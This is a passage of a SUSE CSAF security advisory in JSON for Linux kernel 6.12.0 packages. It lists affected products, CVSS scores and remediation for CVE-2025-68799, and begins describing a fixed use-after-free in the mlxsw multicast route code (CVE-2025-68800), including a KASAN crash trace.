"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68799",
"url": "https://www.suse.com/security/cve/CVE-2025-68799"
},
{
"category": "external",
"summary": "SUSE Bug 1256643 for CVE-2025-68799",
"url": "https://bugzilla.suse.com/1256643"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68799"
},
{
"cve": "CVE-2025-68800",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68800"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n 